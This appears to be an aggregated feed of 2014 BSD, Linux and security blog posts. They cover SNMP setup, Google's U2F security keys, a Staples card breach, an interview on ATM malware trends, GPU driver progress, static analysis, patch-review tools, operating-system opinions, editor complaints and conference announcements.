Planet 2014-10-23 05:01 UTC


Contrary to all the examples I found, it’s not easy to get snmpwalk to communicate with snmpd. I am using the net-mgmt/net-snmp port with the default configuration options. It was installed with:

pkg install net-mgmt/net-snmp

This is the minimal configuration file, which should be placed at /usr/local/etc/snmp/snmpd.conf:

rocommunity public

When starting, you should see [something [...]
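With that one-line snmpd.conf in place, a quick sanity check is to walk the system subtree from the same host; a minimal sketch, assuming the default SNMPv2c community from above and the rc service name the port installs:

```shell
# enable and start the daemon (FreeBSD rc framework)
sysrc snmpd_enable=YES
service snmpd start

# query the system subtree using the read-only community "public";
# -v2c selects protocol version 2c, -c supplies the community string
snmpwalk -v2c -c public localhost system
```

If the community or the listening address is wrong, snmpwalk times out rather than printing an error from the daemon, which is what makes the initial setup confusing.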


People who use Gmail and other Google services now have an extra layer of security available when logging into Google accounts. The company today incorporated into these services the open Universal 2nd Factor (U2F) standard, a physical USB-based second factor sign-in component that only works after verifying the login site is truly a Google site.

A $17 U2F device made by Yubico.
The U2F standard (PDF) is a product of the FIDO (Fast IDentity Online) Alliance, an industry consortium that’s been working to come up with specifications that support a range of more robust authentication technologies, including biometric identifiers and USB security tokens.

The approach announced by Google today essentially offers a more secure way of using the company’s 2-step authentication process. For several years, Google has offered an approach that it calls “2-step verification,” which sends a one-time pass code to the user’s mobile or land line phone.

2-step verification makes it so that even if thieves manage to steal your password, they still need access to your mobile or land line phone if they’re trying to log in with your credentials from a device that Google has not previously seen associated with your account. As Google notes in a support document, security key “offers better protection against this kind of attack, because it uses cryptography instead of verification codes and automatically works only with the website it’s supposed to work with.”

Unlike a one-time token approach, the security key does not rely on mobile phones (so no batteries needed), but the downside is that it doesn’t work for mobile-only users because it requires a USB port. Also, the security key doesn’t work for Google properties on anything other than Chrome.

The move comes a day after Apple launched its Apple Pay platform, a wireless payment system that takes advantage of the near-field communication (NFC) technology built into the new iPhone 6, which allows users to pay for stuff at participating merchants merely by tapping the phone on the store’s payment terminal.

I find it remarkable that Google, Apple and other major tech companies continue to offer more secure and robust authentication options than consumers currently get from their financial institutions. I, for one, will be glad to see Apple, Google or any other legitimate player give the entire mag-stripe based payment infrastructure a run for its money. They could hardly do worse.

Soon enough, government Web sites may also offer consumers more authentication options than many financial sites.  An Executive Order announced last Friday by The White House requires the National Security Council Staff, the Office of Science and Technology Policy and the Office of Management and Budget (OMB) to submit a plan to ensure that all agencies making personal data accessible to citizens through digital applications implement multiple layers of identity assurance, including multi-factor authentication. Verizon Enterprise has a good post with additional details of this announcement.


Hey guys, check out our video on KDEConnect in PC-BSD on YouTube!  It’s an awesome new app that gives you text messages, phone notifications, incoming-call notifications, media remote control, and more!



Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

According to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  


This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.



BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.
OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.



According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe.”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.



Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.


VC4 driver status update anholt's lj | 2014-10-19 20:05 UTC

I've just spent another week hanging out with my Broadcom and Raspberry Pi teammates, and it's unblocked a lot of my work.

Notably, I learned some unstated rules about how loading and storing from the tilebuffer work, which has significantly improved stability on the Pi (as opposed to simulation, which only asserted about following half of these rules).

I got an intro on the debug process for GPU hangs, which ultimately just looks like "run it through simpenrose (the simulator) directly. If that doesn't catch the problem, you capture a .CLIF file of all the buffers involved and feed it into RTL simulation, at which point you can confirm for yourself that yes, it's hanging, and then you hand it to somebody who understands the RTL and they tell you what the deal is." There's also the opportunity to use JTAG to look at the GPU's perspective of memory, which might be useful for some classes of problems. I've started on .CLIF generation (currently simulation-environment-only), but I've got some bugs in my generated files because I'm using packets that the .CLIF generator wasn't prepared for.

I got an overview of the cache hierarchy, which pointed out that I wasn't flushing the ARM dcache to get my writes into the system L2 (more like an L3) so that the GPU could see them. This should also improve stability, since before we were only getting lucky that the GPU would actually see our command stream.

Most importantly, I ended up fixing a mistake in my attempt at reset using the mailbox commands, and now I've got working reset. Testing cycles for GPU hangs have dropped from about 5 minutes to 2-30 seconds. Between working reset and improved stability from loads/stores, we're at the point that X is almost stable. I can now run piglit on actual hardware! (it takes hours, though)

On the X front, the modesetting driver is now merged to the X Server with glamor-based X rendering acceleration. It also happens to support DRI3 buffer passing, but not Present's pageflipping/vblank synchronization. I've submitted a patch series for DRI2 support with vblank synchronization (again, no pageflipping), which will get us more complete GLX extension support, including things like GLX_INTEL_swap_event that gnome-shell really wants.

In other news, I've been talking to a developer at Raspberry Pi who's building the KMS support. Combined with the discussions with keithp and ajax last week about compositing inside the X Server, I think we've got a pretty solid plan for what we want our display stack to look like, so that we can get GL swaps and video presentation into HVS planes, and avoid copies on our very bandwidth-limited hardware. Baby steps first, though -- he's still working on putting giant piles of clock management code into the kernel module so we can even turn on the GPU and displays on our own without using the firmware blob.

Testing status:
- 93.8% passrate on piglit on simulation
- 86.3% passrate on piglit gpu.py on Raspberry Pi
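For anyone wanting to reproduce those numbers, the invocation looks roughly like this; a sketch assuming a piglit checkout (the profile path and result names are illustrative):

```shell
# run the gpu profile and store JSON results under results/vc4-run
./piglit run tests/gpu.py results/vc4-run

# render one or more result sets into an HTML summary for comparison
./piglit summary html summary-dir results/vc4-run
```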

All those opcodes I mentioned in the previous post are now completed -- sadly, I didn't get people up to speed fast enough to contribute before those projects were the biggest things holding back the passrate. I've started a page at http://dri.freedesktop.org/wiki/VC4/ for documenting the setup process and status.

And now, next steps. Now that I've got GPU reset, a high priority is switching to interrupt-based render job tracking and putting an actual command queue in the kernel so we can have multiple GPU jobs queued up by userland at the same time (the VC4 sadly has no ringbuffer like other GPUs have). Then I need to clean up user <-> kernel ABI so that I can start pushing my linux code upstream, and probably work on building userspace BO caching.


I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into good shape and getting settled. Today I finished the last job that I wanted to finish in my apartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)


Fix ALL the BUGS! Luca Barbato | 2014-10-18 12:12 UTC

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful for spotting mistakes, even if their false-positive ratio tends to be quite high. Even the false positives are usually interesting, since they spot code that is unnecessarily convoluted. The code should be as simple as possible, but not simpler.

The basic idea behind those tools is to try to follow the code paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would dereference it).

The problems with this approach are usually two: false positives due to the limited scope of the analyzer, and false negatives due to shadowing.
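On the scan-build side, using the tool amounts to wrapping the normal build; a minimal sketch, assuming clang’s analyzer tools are installed (the report directory name is illustrative):

```shell
# wrap the build so every compile also runs the clang static analyzer;
# HTML reports for each flagged code path land under the -o directory
scan-build -o analyzer-reports make clean all

# serve the generated report directory in a browser
scan-view analyzer-reports/2014-10-18-1
```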

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks earlier in the code flow.

In those cases you should spend enough time to make sure Coverity is wrong and that those faulty inputs aren’t slipping in somewhere. NEVER just add some checks to the flagged code as a first move; you might hide real issues (e.g. if Coverity complains about an uninitialized variable, do not just initialize it to something, check why that happens and whether the logic behind it is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic; the static analyzers simply keep some limit on how deep they go, depending on the issues already present and on how much time has been spent already.

That surprise has been fun, since apparently some of the time limit is per compilation unit, so splitting large files into smaller chunks gets us more results (while also speeding up the build thanks to better parallelism).

Usually fixing one high-impact issue gets us 3 to 5 new small-impact issues.

I like solving puzzles, so I do not mind having more fun; sadly I have not had much spare time to play this game lately.

Merge ALL the FIXES

Properly fixing all the issues is a lofty goal, and as usual having a patch is just half of the work. Usually two sets of eyes work better than one, and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.
So far 100+ patches have piled up over the past weeks, and they are now being sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know.)

During the review, probably about 1/10 of the patches will be rejected, and the corresponding Coverity reports updated with enough information to explain why each is a false positive or why the dangerous or strange behaviour pointed out is intentional.

The fixes will then flow into the next point release of each of our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers who spend their free time keeping all the branches up to date!


Tracking patches Luca Barbato | 2014-10-18 11:53 UTC

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond of improving the tools I use, and that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I have already discussed lldb and asan/valgrind; my current focus is patch trackers, in part due to the current effort to improve the Libav one.

Contributors

Before talking about patches and their tracking, I’ll digress a little on who produces them: the mythical Contributor. Without contributions an open-source project would not exist.

You might have recurring contributions and unique or seldom contributions. Both are quite important.
In general you should try to make seldom contributors become recurring contributors.

A recurring contributor can accept spending some additional time to set up the environment needed to actually provide a contribution back to the community; a sporadic contributor can easily be put off if the effort required to send a patch is larger than writing the patch itself.

The project maintainers should make the life of contributors as simple as possible.

Patches and Revision Control

Lately most open-source projects have seen the light and started to use decentralized revision control systems, and thanks to GitHub and many others the concept of the pull request is becoming part of our culture, and with it hopefully a wider acceptance of the fact that code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario, new code is usually developed in topic branches, routinely rebased against master until the set is ready; then the set of changes (called a series or patchset) is reviewed and, after some rounds of fixes, eventually merged. Thanks to Bitbucket we now have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review, bugs are usually spotted and ways to improve are suggested. Patches might be split up or squashed together, and the series reworked and improved a lot.

The process is usually time consuming, even more so for an organization made of volunteers: writing code is fun, addressing the issues spotted is less so, and reviewing someone else’s code even less.

Sadly it is a necessary annoyance, since otherwise the errors (and horrors) that slipped through would be much bigger and probably much more numerous. If you do not care about code quality and what you are writing is not used by other people, you can probably skip it; otherwise you should feel somewhat concerned that what you wrote might turn some people’s lives into a sea of pain. (On the other hand, some gratitude for such a daunting effort is usually welcome.)

Pull request management

The old-fashioned way to issue a pull request is either to poke somebody, telling them that your branch is ready for merge, or just to make a set of patches and mail them to whoever is in charge of integrating code into the main branch.

git provides a nifty tool to do that, called git send-email, and it is quite common to send sets of patches (usually called a series) to a mailing list. You get feedback by email, and you can send updates to the set using the --in-reply-to option and the message id.
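A hedged sketch of that workflow (the list address and message id below are invented for illustration):

```shell
# export the top 3 commits as a series with a cover letter, then mail it
git format-patch --cover-letter -3 -o v1/
git send-email --to=libav-devel@example.org v1/*.patch

# after reworking the branch, export v2 and thread it under the original mail
git format-patch -v2 -3 -o v2/
git send-email --to=libav-devel@example.org \
    --in-reply-to='<cover.1413628414.git.dev@example.org>' v2/*.patch
```

Threading the v2 series under the original cover letter is what keeps updates sorted together in reviewers’ mailboxes.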

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to set up ephemeral branches in some staging area; the review process then again requires a browser. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach is the most setup-intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am, and if the In-Reply-To field is used properly, updates appear sorted in a sensible way.
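The apply side can be exercised entirely locally; a small self-contained sketch using throwaway repositories (paths and commit messages are invented):

```shell
set -e
work=$(mktemp -d)

# an "upstream" repository with a single commit
git init -q "$work/upstream"
git -C "$work/upstream" config user.email dev@example.org
git -C "$work/upstream" config user.name Dev
echo hello > "$work/upstream/file.txt"
git -C "$work/upstream" add file.txt
git -C "$work/upstream" commit -q -m "initial import"

# a contributor clones it, commits a fix, and exports it as a mailbox patch
git clone -q "$work/upstream" "$work/contrib"
git -C "$work/contrib" config user.email c@example.org
git -C "$work/contrib" config user.name Contributor
echo fix >> "$work/contrib/file.txt"
git -C "$work/contrib" commit -q -am "fix: append marker"
git -C "$work/contrib" format-patch -1 -o "$work/outbox"

# the maintainer applies the series straight from the mailbox files
git -C "$work/upstream" am "$work/outbox"/*.patch
git -C "$work/upstream" log --oneline
```

The same git am invocation works on an mbox saved directly from the mailing list, which is the whole appeal of the email workflow.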

This method is the simplest for people used to having their email client always open next to a console (if they are using a well-configured emacs or vim, they literally never move away from the editor).

On the other hand, people using webmail or a basic email client might find the approach more cumbersome than a web-based one.

If your only means of tracking contributions is a mailing list, it gets quite easy to forget the status of a set. Patches can be neglected, and even their authors might forget about them for a long time.

Patchwork approach

Patchwork tracks the patches that hit a mailing list and tries to figure out automatically whether they eventually get merged.

It is quite basic: it provides a web interface to check the status and a means to update the patch status. The review must happen on the mailing list, and there is no concept of a series.

As basic as it is, it works as a reminder about pending patches, but it tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes it much easier to spot what is pending and what its status is; people used to having everything in the browser (Chrome and Mozilla can lately be made to work as a decent IDE) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People who do not live in a browser find the context switch quite annoying, and contributing requires additional effort, since you have to register on a website and the process of issuing a patch takes many additional steps, while the email approach just requires typing git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than their GitHub counterparts. That can be good or bad, since they are not as immediate and tend to overwhelm new contributors.

You need to make an additional effort to set up your environment, since you need some custom scripts.

The series are tracked with additional precision, but for all practical purposes it is the same as GitHub, with an additional burden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

Its basic concept is to be as non-intrusive as possible, retaining all the pros of the simple git+email workflow, just as patchwork does.

It already provides additional features, such as the ability to manage series of patches and to track updates to them. It sports a view that gives a breakdown of which series require a review and which have been pending for a long time waiting for an update.

What’s pending is the ability to review directly in the browser, to send the review email from the web to the mailing list, and some more.

I will probably complete it within the year or by next spring; if you like Flask or Python, contributions are warmly welcome!


Admittedly: I love flame wars. Especially when they are about the right™ operating system. In the past I was never at a loss for a controversial contribution to such flames, and let’s be honest: whose fingers haven’t itched? But when I allow myself a look at today’s operating-system reality, I have to soberly admit that I have, at least in part, lost my license to flame.

In my study alone, five operating systems peacefully share four different devices: the workstation hums along under Arch Linux but also boots Windows 7 when needed (mainly for virtual flying); the MacBook runs (surprise!) OS X, the Sun Blade runs Solaris, and the phone runs Android. If you count the physically off-site machines, two FreeBSD installations (on servers for web, mail and whatever else might come to mind) and a Linux on the home server join in.

Commercial vs. open source

For many people (including me in an earlier life) this is a moral and religious question, and therefore not one that allows a pragmatic answer. By now, however, I am convinced that one of the main factors in how you judge this question lies in your own financial means. Anyone who cannot or will not spend money on software will suspect the ultimate evil in paid offerings, if only because access to them (at least by legal means) is denied to him.

Sure, if I find a good, fitting solution for a problem in the FOSS world, I will use it. But neither do I forgo commercial software when it simply serves a given purpose better. I actually prefer it when the consideration expected from me (e.g. a license payment) is clearly visible; business models in which a service is supposedly offered to me for free make me rather suspicious. That does not, of course, apply to genuine FOSS products, but it does apply to (supposedly) free-to-use services.

And, to some extent, it also applies to the free distribution of operating systems such as Android or OS X. Or how should one judge Ubuntu Linux in this context? The software itself is open source, but unlike FreeBSD, say, there is no non-profit foundation behind Ubuntu; instead there is Canonical, a company that ultimately has to earn money. Sure, the same is true of Red Hat, except that there the business model is transparent and clearly visible.

Faith in technology

Many arguments speak for or against a particular operating system; I too used to believe that Linux was inherently superior to Windows, and not only for moral reasons. Over time you learn that while there certainly is a “coolness factor” (the nerdier the system, the better), it is not necessarily proportional to how well an operating system suits a particular purpose.

For many everyday tasks at work I use Arch Linux these days. Completely un-nerdy, with KDE, and not with one of the far nerdier tiling window managers. The reason is simple: habit. I have grown used to the strengths and weaknesses of this system. The latter in particular is often underestimated: the ability to work around a system’s weaknesses is something you acquire only through long use and experience. And let’s be honest: every system has weaknesses, just as every system has strengths.

This personally acquired knowledge of how to handle strengths and weaknesses is, in my view, another strong motivator in operating-system flame wars. Being open to other systems simply means putting your own expert status up for debate, if only in your own eyes. It also works the other way around: the more broadly your knowledge is spread across many systems, the more balanced and objective your position becomes, until it is ultimately no good for flame wars anymore…

Gone soft?

Does that mean I am no longer allowed to rant about certain systems or distributions? Not at all; the arguments just have to be different ones in order to remain credible, and the criticism accordingly turns out less sweeping. My personal list of things I dislike is almost arbitrarily long and hops right across the world of operating systems. Naturally, though, the top spots go to topics related to the system I use most often. Here are the top 3:

  • I don't like systemd. Added value over OpenRC or plain init scripts: none at all for me as an end user; instead, problem after problem and unforeseen misbehavior, plus greater administrative complexity.
  • The same goes for PulseAudio, yet another Poetterism.
  • An old chestnut, by contrast, is the sick code quality of glibc; for people who have to write portable C code and hoped they could rely on the POSIX standard, it is one long nightmare.
Although this criticism applies in full to Arch Linux with KDE, I continue to use it. The moment another OS took Arch Linux's place, chances are good that the order of my personal hate list would change.

Conclusion

Flame wars are full of arguments about why a particular OS is unsuitable for a particular purpose, typically delivered in a less-than-objective tone (“It's your own fault, you victim, for running …”). In such a discussion, asking why system xy is supposedly so well suited to a given purpose not only helps bring the debate back to facts, it can also be wickedly fun, especially if you keep in mind the motivations presumably driving the other participants…


Sublime Lives My Universe | 2014-10-18 09:23 UTC

Those declared dead live longer; the makers of Sublime seem to have thought something along those lines. Shortly after swan songs could be heard all over the Internet, a new build, number 3065, was released. Granted, that is itself almost two months ago now, but it is a sign of life at least.

What is interesting about the new build: not only were bugs fixed and the Python API (minimally) updated; new features also made it in, among them sidebar icons. Some may argue that this feature was stolen from Atom; I won't deny it, and a corresponding plugin has existed for Atom for quite a while.

Speaking of Atom: although it is a good open source alternative to Sublime, the latter is far from out of the race for me. The reason is almost banal: Atom clearly targets OS X users; on the side, it is also reasonably maintainable on Arch Linux thanks to the AUR. Windows users, however, are systematically neglected.

Sublime, on the other hand, offers ready-made binaries for Windows as well, even in a portable version, which makes it particularly attractive to me. After all, I have no administrator rights on my employer's Windows machines, which currently makes installing Atom next to impossible.

So it remains exciting: will Sublime 3 be finished at some point, or will the Atom developers manage to provide a portable Windows version first?


Hey everyone, just a quick heads-up: we've started a PC-BSD YouTube channel! If you want to check it out, you can follow this link: https://www.youtube.com/channel/UCyd7MaPVUpa-ueUsGjUujag. Don't forget to subscribe for new videos, and if you have a video or tutorial you'd like to submit, send it my way! We only have a couple of videos right now, so we need your help to grow our channel :). We'd also love for you to submit ideas for videos we can make in the future.

Thanks!


My ideal editor Flameeyes's Weblog | 2014-10-17 19:03 UTC


Photo credit: Stephen Dann
Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about them since at least last year, when Typo decided to start eating my drafts. After that near-meltdown I decided to look for alternatives for writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to get the new one – and then with Google Docs.

I kept using Google Docs until recently, when it started having issues with dead keys. I have been using the US International layout for years, and I'm too used to it even when I write English. If I use a keyboard layout without dead keys, I end up adding spaces where they shouldn't be. So even though switching layouts would work around the problem, I wouldn't want to write a long text that way.

Then I decided to give Evernote another try, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12-month subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while, until they decided to throw me into the new beta editor, which follows all the newest trends in blog editors. Yes, because there are trends in editors now! Away goes full-width editing; instead you get a limited-width editing space in a mostly-white canvas with a disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting to me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear: yes, I have used offline editing for a while in the past, as Typo's editor has been overly sensitive to changes too many times. But it does not scale. I'm not always on the same device: not only do I have three computers in my own apartment, I have two more at work, and then I have tablets. It is not uncommon for me to start writing a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post at a conference with my work laptop and then finish it in my room on the personal one, and so on and so forth.

Yes, I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great if one of the devices ends up offline by mistake — better than its effects on password syncs, but not by much. Indeed I have had bad experiences with it, because it makes it too easy to start working on something completely offline and then forget to resync it before editing it from a different device.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First, they suffer from the same offline-work problems stated above; second, they don't really support comments as first-class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, embedding them in the page as an external iframe. Not only do I dislike the idea of farming out comments to a different service in general, I would also be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered through my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.


Several members of the PC-BSD and FreeBSD Projects will be at Ohio LinuxFest, to be held at the Greater Columbus Convention Center in Columbus, OH on October 24–26. Paid and free registration is available for this event.

Ken Moore will present “Lumina DE: A new desktop environment for PC-BSD” on Friday, October 24 at 11:00. Dru Lavigne will present “A Sneak Peek at FreeNAS 9.3” on Friday, October 24 at 15:00. Dan Langille will present “Virtualization with FreeBSD Jails, ezjail, and ZFS” on Saturday, October 25 at 14:00.

There will be a FreeBSD booth in the expo area. Expo hours are 17:00–19:00 on Friday, October 24 and 8:00–17:00 on Saturday, October 25. As usual, we’ll have cool swag, PC-BSD DVDs, FreeNAS CDs, and will accept donations to the FreeBSD Foundation.

The BSDA certification exam will be available at 16:00 on Saturday, October 25 and at 10:00 on Sunday, October 26. The cost for the exam is $75.


There will be a FreeBSD booth in the expo area of All Things Open, to be held at the Raleigh Convention Center in Raleigh, NC on October 22–23. Registration is required for this event.

Expo hours are from 8:00–17:00 on Wednesday, October 22 and Thursday, October 23. As usual, we’ll have some cool swag, PC-BSD DVDs, FreeNAS CDs, and brochures. We will also accept donations to the FreeBSD Foundation.


Short version: I used this regex when restoring to a jail on the slocum server: !/\.zfs/snapshot/snapshot-for-backup/!/! Background Today I did this when setting up an ssh-key on a new host: ssh-add -L > ~/.ssh/authorized_keys Oh. That should have been >>. Restoring During the Bacula restore, I need to change this path: /usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/ to /usr/jails/mydev/usr/home/dan/.ssh/ That [...]
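For illustration only: the Bacula strip regex above uses `!` as the substitution delimiter, so it performs the same rewrite as this sed expression (the sample path is the one from the excerpt):

```shell
# Strip the ZFS snapshot prefix that was recorded at backup time,
# turning the snapshot path back into the live filesystem path.
restored='/usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/authorized_keys'
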